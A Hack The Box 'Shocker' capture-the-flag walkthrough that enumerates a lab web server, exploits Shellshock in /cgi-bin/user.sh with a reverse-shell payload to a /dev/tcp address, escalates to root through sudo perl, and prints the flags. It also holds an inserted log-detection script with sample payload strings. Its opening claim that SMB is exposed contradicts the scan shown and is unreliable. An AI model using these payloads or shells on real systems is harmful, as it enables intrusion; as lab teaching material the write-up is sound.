Hack The Box – Shocker – Walkthrough

SMB is exposed.

# nmap -A -n -F -T5 shocker.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 03:23 UTC
Nmap scan report for shocker.htb (10.10.10.56)
Host is up (0.045s latency).
Not shown: 99 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: print server|printer|general purpose|VoIP phone|broadband router
Running (JUST GUESSING): HP embedded (90%), IBM AIX 4.X (86%), Tadiran embedded (85%), Wind River VxWorks 5.X (85%), Motorola embedded (85%), Microsoft Windows 2003|XP (85%)
OS CPE: cpe:/h:hp:jetdirect_170x cpe:/h:hp:inkjet_3000 cpe:/o:ibm:aix:4.3 cpe:/h:tadiran:flexset-ip_280s cpe:/o:windriver:vxworks:5.4 cpe:/h:motorola:surfboard_sbv5121 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_xp
Aggressive OS guesses: HP 170X print server or Inkjet 3000 printer (90%), HP LaserJet 4250 printer (87%), IBM AIX 4.3 (86%), Tadiran FlexSet-IP 280S VoIP phone (85%), Motorola SURFboard SBV5121 broadband router (VxWorks 5.4) (85%), Microsoft Windows Server 2003 SP2 (85%), Microsoft Windows XP (85%), Microsoft Windows XP SP3 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

Let's try accessing port 80.

gobuster did not find any directories.

# gobuster dir -u http://shocker.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://shocker.htb
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/08/16 03:30:41 Starting gobuster
===============================================================
Progress: 65661 / 220561 (29.77%)

Using dirb, we find that /cgi-bin/user.sh exists.

# dirb http://shocker.htb/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Aug 16 07:39:22 2020
URL_BASE: http://shocker.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://shocker.htb/ ----
+ http://shocker.htb/cgi-bin/ (CODE:403|SIZE:294)
+ http://shocker.htb/index.html (CODE:200|SIZE:137)
+ http://shocker.htb/server-status (CODE:403|SIZE:299)

-----------------
END_TIME: Sun Aug 16 07:57:47 2020
DOWNLOADED: 4612 - FOUND: 3

# dirb http://shocker.htb/cgi-bin/ -w /usr/share/dirb/common.txt -X .sh

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Aug 16 08:01:30 2020
URL_BASE: http://shocker.htb/cgi-bin/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Stopping on warning messages
EXTENSIONS_LIST: (.sh) | (.sh) [NUM = 1]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://shocker.htb/cgi-bin/ ----
+ http://shocker.htb/cgi-bin/user.sh (CODE:200|SIZE:118)

-----------------
END_TIME: Sun Aug 16 08:20:29 2020
DOWNLOADED: 4612 - FOUND: 1

Given the machine name, let's try Shellshock.

# searchsploit shellshock
--------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                 |  Path
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Advantech Switch - 'Shellshock' Bash Environment Variable Command Injection (Metasploit)                       | cgi/remote/38849.rb
Apache mod_cgi - 'Shellshock' Remote Command Injection                                                         | linux/remote/34900.py
Bash - 'Shellshock' Environment Variables Command Injection                                                    | linux/remote/34766.php
Bash CGI - 'Shellshock' Remote Command Injection (Metasploit)                                                  | cgi/webapps/34895.rb
Cisco UCS Manager 2.1(1b) - Remote Command Injection (Shellshock)                                              | hardware/remote/39568.py
dhclient 4.1 - Bash Environment Variable Command Injection (Shellshock)                                        | linux/remote/36933.py
GNU Bash - 'Shellshock' Environment Variable Command Injection                                                 | linux/remote/34765.txt
IPFire - 'Shellshock' Bash Environment Variable Command Injection (Metasploit)                                 | cgi/remote/39918.rb
NUUO NVRmini 2 3.0.8 - Remote Command Injection (Shellshock)                                                   | cgi/webapps/40213.txt
OpenVPN 2.2.29 - 'Shellshock' Remote Command Injection                                                         | linux/remote/34879.txt
PHP < 5.6.2 - 'Shellshock' Safe Mode / disable_functions Bypass / Command Injection                            | php/webapps/35146.txt
Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection                                            | linux/remote/34896.py
RedStar 3.0 Server - 'Shellshock' 'BEAM' / 'RSSMON' Command Injection                                          | linux/local/40938.py
Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Command Injection (Shellshock)                  | cgi/webapps/39887.txt
TrendMicro InterScan Web Security Virtual Appliance - 'Shellshock' Remote Command Injection                    | hardware/remote/40619.py
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

# searchsploit -m linux/remote/34900.py

# sed -i 's/\r//' 34900.py

# python 34900.py payload=reverse rhost=10.10.10.56 lhost=172.17.0.2 lport=4444 pages=/cgi-bin/user.sh
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/user.sh
[!] Successfully exploited
[!] Incoming connection from 172.17.0.1
172.17.0.1> id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

172.17.0.1> pwd
/usr/lib/cgi-bin

172.17.0.1> cat /home/shelly/user.txt
2ec24e11320026d1e70ff3e16695b233

172.17.0.1> sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

172.17.0.1> sudo /usr/bin/perl -e 'exec "/bin/bash";'
172.17.0.1> id
uid=0(root) gid=0(root) groups=0(root)

172.17.0.1> cat /root/root.txt
52c2715605d70c7619030560dc1ca467
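The exploit above works because mod_cgi copies request headers into the CGI script's environment, where a value beginning with a bash function definition (`() { :;}; ...`) gets executed. As an added example, not part of the original walkthrough, here is a Python check that scans Apache combined-format access-log lines for that prefix in the logged User-Agent and Referer values; the log format is assumed, and the sample lines are constructed.

```python
import re

# Shellshock attempts arrive as a bash function definition ("() {" ...) in a
# value that mod_cgi exports into the CGI script's environment, such as the
# User-Agent or Referer header. This regex is the signature for that prefix.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache "combined" access-log layout (assumed). Only Referer and User-Agent
# are logged by default, so payloads carried in other headers (e.g. Cookie)
# are invisible to a log-based check and need request-level inspection.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def inspect_line(line):
    """Return (client, path, header) for every logged header carrying the prefix."""
    m = LOG_RE.match(line)
    if not m:
        return []  # not a combined-format line; skip rather than guess
    path = m["target"].partition("?")[0]
    hits = []
    for header, value in (("User-Agent", m["ua"]), ("Referer", m["referer"])):
        if SHELLSHOCK_RE.search(value):
            hits.append((m["ip"], path, header))
    return hits

def find_shellshock(lines):
    """Scan an iterable of access-log lines and collect all hits in order."""
    return [hit for line in lines for hit in inspect_line(line)]

# Constructed sample lines (not from the walkthrough). The payloads run a
# harmless command; only the "() {" prefix matters for detection.
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Aug/2020:07:39:22 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [16/Aug/2020:08:25:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :;}; /bin/bash -c id"',
    '192.0.2.10 - - [16/Aug/2020:08:25:02 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 500 0 "() { :;}; /usr/bin/id" "curl/7.68.0"',
]

if __name__ == "__main__":
    for client, path, header in find_shellshock(SAMPLE_LOG):
        print(f"{client} -> {path}: Shellshock prefix in {header}")
```

A hit against a path under /cgi-bin/ on a host still running a pre-fix bash is the case to treat as a probable compromise rather than a mere probe.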

Because Kali Linux is running in Docker, 34900.py has been partially modified.

# diff 34900.py /usr/share/exploitdb/exploits/linux/remote/34900.py
76c76
<               payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/10.10.14.7/"+str(lport)+" 0>&1 &"
---
>               payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &"
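Review bot: the `<` line replaces the `lhost` variable with the literal address 10.10.14.7, so the `lhost=172.17.0.2` argument passed on the command line above is still parsed but no longer affects the payload; a cleaner change is to pass the address the target can reach as `lhost` instead of editing the string, or, if the literal must stay, to drop or document the now-ignored argument so the two addresses cannot silently disagree.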